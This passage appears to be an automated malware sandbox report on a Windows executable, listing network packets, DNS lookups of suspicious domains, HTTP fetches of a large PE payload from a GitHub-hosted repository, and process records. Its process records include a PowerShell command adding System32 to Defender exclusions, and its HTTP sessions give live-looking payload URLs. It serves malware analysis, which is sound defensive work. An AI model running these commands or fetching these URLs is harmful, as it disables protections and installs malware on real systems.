                                                                                            Dec 20, 2024 16:21:56.290632963 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.290656090 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.293637037 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.293667078 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.293700933 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.293708086 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.293734074 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.293752909 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.297403097 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.297429085 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.297466040 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.297473907 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.297498941 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.297508001 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.300659895 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.300684929 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.300729036 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.300735950 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.300760031 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.300775051 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.385812044 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.385843039 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.385876894 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.385891914 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.385914087 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.385929108 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.398528099 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.398561001 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.398597956 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.398611069 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.398636103 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.398657084 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.401695013 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.401726961 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.401762009 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.401771069 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.401802063 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.401823044 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.411974907 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.412003994 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.412039995 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.412050962 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.412067890 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.412084103 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.483674049 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.483700991 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.483743906 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.483766079 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.483795881 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.483835936 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.487776995 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.487804890 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.487863064 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.487874031 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.487915039 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.491018057 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.491039991 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.491099119 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.491106033 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.491154909 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.494791985 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.494808912 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.494843006 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.494851112 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.494893074 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.578144073 CET44349873185.199.108.133192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:20:17.062185049 CET | 192.168.2.8 | 1.1.1.1 | 0xd69 | Standard query (0) | unvmainx.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:22.021013975 CET | 192.168.2.8 | 1.1.1.1 | 0xdaff | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:30.118288994 CET | 192.168.2.8 | 1.1.1.1 | 0x63b2 | Standard query (0) | unvdwl.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:43.313679934 CET | 192.168.2.8 | 1.1.1.1 | 0x173b | Standard query (0) | dns.google | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:52.892563105 CET | 192.168.2.8 | 1.1.1.1 | 0x983a | Standard query (0) | rootunvdwl.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:58.266985893 CET | 192.168.2.8 | 1.1.1.1 | 0x3e06 | Standard query (0) | rootunvdwl.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:11.332559109 CET | 192.168.2.8 | 1.1.1.1 | 0x335 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:18.064047098 CET | 192.168.2.8 | 1.1.1.1 | 0xbd48 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:20.467987061 CET | 192.168.2.8 | 1.1.1.1 | 0x5af6 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:20:17.440871954 CET | 1.1.1.1 | 192.168.2.8 | 0xd69 | No error (0) | unvmainx.com | | 194.26.192.189 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:22.158576965 CET | 1.1.1.1 | 192.168.2.8 | 0xdaff | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:30.558769941 CET | 1.1.1.1 | 192.168.2.8 | 0x63b2 | No error (0) | unvdwl.com | | 45.94.31.128 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:43.451956034 CET | 1.1.1.1 | 192.168.2.8 | 0x173b | No error (0) | dns.google | | 8.8.4.4 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:20:43.451956034 CET | 1.1.1.1 | 192.168.2.8 | 0x173b | No error (0) | dns.google | | 8.8.8.8 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:11.469702959 CET | 1.1.1.1 | 192.168.2.8 | 0x335 | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:18.202142000 CET | 1.1.1.1 | 192.168.2.8 | 0xbd48 | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:20.607717037 CET | 1.1.1.1 | 192.168.2.8 | 0x5af6 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:20.607717037 CET | 1.1.1.1 | 192.168.2.8 | 0x5af6 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:20.607717037 CET | 1.1.1.1 | 192.168.2.8 | 0x5af6 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:21:20.607717037 CET | 1.1.1.1 | 192.168.2.8 | 0x5af6 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                                                                                            • ipinfo.io
                                                                                            • dns.google
                                                                                            • github.com
                                                                                            • raw.githubusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49717 | 45.94.31.128 | 80 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:20:30.680303097 CET | 74 | OUT | HEAD /un1/unvurestorehardx.dat HTTP/1.1
Host: unvdwl.com
Accept: */*
Dec 20, 2024 16:20:31.921175957 CET | 164 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.22.0 (Ubuntu)
Date: Fri, 20 Dec 2024 15:20:31 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49720 | 45.94.31.128 | 80 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:20:37.059886932 CET | 74 | OUT | HEAD /un1/unvurestorehardx.dat HTTP/1.1
Host: unvdwl.com
Accept: */*
Dec 20, 2024 16:20:38.300461054 CET | 164 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.22.0 (Ubuntu)
Date: Fri, 20 Dec 2024 15:20:38 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49729 | 45.94.31.128 | 80 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:20:51.637906075 CET | 76 | OUT | HEAD /un1/unvurestorehardx.dat HTTP/1.1
Host: 45.94.31.128
Accept: */*
Dec 20, 2024 16:20:52.890250921 CET | 164 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.22.0 (Ubuntu)
Date: Fri, 20 Dec 2024 15:20:52 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 34.117.59.81 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:20:29 UTC | 52 | OUT | GET /json HTTP/1.1
Host: ipinfo.io
Accept: */*
2024-12-20 15:20:30 UTC | 345 | IN | HTTP/1.1 200 OK
access-control-allow-origin: *
Content-Length: 321
content-type: application/json; charset=utf-8
date: Fri, 20 Dec 2024 15:20:29 GMT
x-content-type-options: nosniff
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-12-20 15:20:30 UTC | 321 | IN | Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49727 | 8.8.4.4 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:20:51 UTC | 72 | OUT | GET /resolve?name=unvdwl.com HTTP/1.1
Host: dns.google
Accept: */*
2024-12-20 15:20:51 UTC | 548 | IN | HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Date: Fri, 20 Dec 2024 15:20:51 GMT
Expires: Fri, 20 Dec 2024 15:20:51 GMT
Cache-Control: private, max-age=9918
Content-Type: application/json; charset=UTF-8
Server: HTTP server (unknown)
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-20 15:20:51 UTC | 192 | IN | Data Ascii: ba{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"unvdwl.com.","type":1}],"Answer":[{"name":"unvdwl.com.","type":1,"TTL":9918,"data":"45.94.31.128"}]}
2024-12-20 15:20:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.8497798.8.4.44436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:10 UTC76OUTGET /resolve?name=rootunvdwl.com HTTP/1.1
                                                                                            Host: dns.google
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:11 UTC548INHTTP/1.1 200 OK
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Date: Fri, 20 Dec 2024 15:21:11 GMT
                                                                                            Expires: Fri, 20 Dec 2024 15:21:11 GMT
                                                                                            Cache-Control: private, max-age=1174
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            Server: HTTP server (unknown)
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
2024-12-20 15:21:11 UTC | 264 | IN | Data Ascii: 101{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"rootunvdwl.com.","type":1}],"Authority":[{"name":"rootunvdwl.com.","type":6,"TTL":1174,"data":"1-you.njalla.no. you.can-get-no.info. 2024092708 21600 7200 1814400 3
2024-12-20 15:21:11 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49804 | 20.233.83.145 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:21:19 UTC | 94 | OUT | HEAD /unvdwl/dwl/raw/main/unvumainrestorehardx.dat HTTP/1.1
                                                                                            Host: github.com
                                                                                            Accept: */*
2024-12-20 15:21:20 UTC | 442 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: GitHub.com
                                                                                            Date: Fri, 20 Dec 2024 15:21:11 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                            Cache-Control: no-cache
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                            X-Frame-Options: deny
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Referrer-Policy: no-referrer-when-downgrade
2024-12-20 15:21:20 UTC | 3383 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49829 | 185.199.108.133 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:21:28 UTC | 123 | OUT | HEAD /rootunvbot/mydata/refs/heads/main/unvumainrestorehardx.dat HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Accept: */*
2024-12-20 15:21:28 UTC | 804 | IN | HTTP/1.1 404 Not Found
                                                                                            Connection: close
                                                                                            Content-Length: 14
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            X-GitHub-Request-Id: E7DD:1E2FCC:102100F:11FBC66:67658B77
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Fri, 20 Dec 2024 15:21:28 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-ewr-kewr1740054-EWR
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1734708088.395102,VS0,VE8
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: f4ac69695fb846c7d8c2b5d2b72fff0393e58471
                                                                                            Expires: Fri, 20 Dec 2024 15:26:28 GMT
                                                                                            Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49853 | 20.233.83.145 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:21:36 UTC | 94 | OUT | HEAD /runvd01/dwl/raw/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: github.com
                                                                                            Accept: */*
2024-12-20 15:21:37 UTC | 555 | IN | HTTP/1.1 302 Found
                                                                                            Server: GitHub.com
                                                                                            Date: Fri, 20 Dec 2024 15:21:22 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                            Access-Control-Allow-Origin:
                                                                                            Location: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.dat
                                                                                            Cache-Control: no-cache
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                            X-Frame-Options: deny
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Referrer-Policy: no-referrer-when-downgrade
2024-12-20 15:21:37 UTC | 3380 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49861 | 185.199.108.133 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:21:38 UTC | 105 | OUT | HEAD /runvd01/dwl/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Accept: */*
2024-12-20 15:21:39 UTC | 900 | IN | HTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 94192128
                                                                                            Cache-Control: max-age=300
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "dce1db2ce302903971db053f8dd758f861a96202945985b58fb23f43edfcddee"
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-GitHub-Request-Id: 3BE7:C89C2:2E62F1:33B873:676568E7
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Fri, 20 Dec 2024 15:21:38 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-ewr-kewr1740037-EWR
                                                                                            X-Cache: HIT
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1734708099.949680,VS0,VE9
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: e20738dd108177a3fb9f55193c7cd13e20a586e9
                                                                                            Expires: Fri, 20 Dec 2024 15:26:38 GMT
                                                                                            Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49867 | 20.233.83.145 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:21:40 UTC | 93 | OUT | GET /runvd01/dwl/raw/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: github.com
                                                                                            Accept: */*
2024-12-20 15:21:41 UTC | 555 | IN | HTTP/1.1 302 Found
                                                                                            Server: GitHub.com
                                                                                            Date: Fri, 20 Dec 2024 15:21:22 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                            Access-Control-Allow-Origin:
                                                                                            Location: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.dat
                                                                                            Cache-Control: no-cache
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                            X-Frame-Options: deny
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Referrer-Policy: no-referrer-when-downgrade
2024-12-20 15:21:41 UTC | 3380 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49873 | 185.199.108.133 | 443 | 6848 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:21:42 UTC | 104 | OUT | GET /runvd01/dwl/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Accept: */*
2024-12-20 15:21:43 UTC | 905 | IN | HTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 94192128
                                                                                            Cache-Control: max-age=300
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "dce1db2ce302903971db053f8dd758f861a96202945985b58fb23f43edfcddee"
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-GitHub-Request-Id: 17E5:140A97:F851C7:115FED7:67658B86
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Fri, 20 Dec 2024 15:21:43 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-nyc-kteb1890090-NYC
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1734708103.893557,VS0,VE484
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: caa779bbae0cd484c72231e12566b2cf293a20fd
                                                                                            Expires: Fri, 20 Dec 2024 15:26:43 GMT
                                                                                            Source-Age: 0
2024-12-20 15:21:43 UTC | 1378 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdOeg."'@> E`
                                                                                            Data Ascii: HVAH)H<AH)H"AH)HAH)HAH)HAH)HLH]UHHEE}H N]HEHEHEHE
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 16 25 9d 05 01 00 00 00 e9 71 ff ff ff 90 48 83 ec 28 83 fa 03 74 17 85 d2 74 13 b8 01 00 00 00 48 83 c4 28 c3 66 0f 1f 84 00 00 00 00 00 e8 5b 07 00 00 b8 01 00 00 00 48 83 c4 28 c3 90 56 53 48 83 ec 28 48 8b 05 23 ff 9c 05 83 38 02 74 06 c7 00 02 00 00 00 83 fa 02 74 13 83 fa 01 74 4e b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 90 48 8d 1d 69 53 9d 05 48 8d 35 62 53 9d 05 48 39 de 74 df 0f 1f 44 00 00 48 8b 03 48 85 c0 74 02 ff d0 48 83 c3 08 48 39 de 75 ed b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 0f 1f 84 00 00 00 00 00 e8 db 06 00 00 b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 31 c0 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 48 83 ec 38 48 8d 44 24 58 48 89 cb b9 02 00 00 00 48 89 54 24 58 4c 89 44 24 60 4c 89 4c 24
                                                                                            Data Ascii: %qH(ttH(f[H(VSH(H#8tttNH([^fHiSH5bSH9tDHHtHH9uH([^fH([^ff.@1VSH8HD$XHHT$XLD$`LL$



                                                                                            Target ID:0
                                                                                            Start time:10:19:49
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Users\user\Desktop\58VSNPxrI4.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\58VSNPxrI4.exe"
                                                                                            Imagebase:0x7ff783aa0000
                                                                                            File size:14'664'704 bytes
                                                                                            MD5 hash:228C09C31156D45DFE94195BB34D1399
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:10:19:50
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:10:19:50
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:10:19:50
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:10:19:54
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:10:19:54
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
